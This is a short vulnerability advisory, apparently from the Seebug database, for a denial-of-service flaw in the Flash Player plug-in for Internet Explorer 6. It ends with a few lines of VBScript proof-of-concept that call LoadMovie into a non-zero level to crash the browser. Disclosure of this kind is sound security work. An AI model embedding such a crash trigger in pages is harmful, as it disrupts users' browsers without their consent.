Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability

ID SSV:77656
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


It has been reported that Macromedia Flash Player for Internet Explorer may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue is reported to exist in the 'LoadMovie' function by calling the function and loading a flash movie into a non-zero level in the following manner:

LoadMovie 1,"c6ool.swf"

This vulnerability is reported to be tested in Flash Player 7.0 r19 running on WindowsXP Professional SP1 and SP2. 

<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"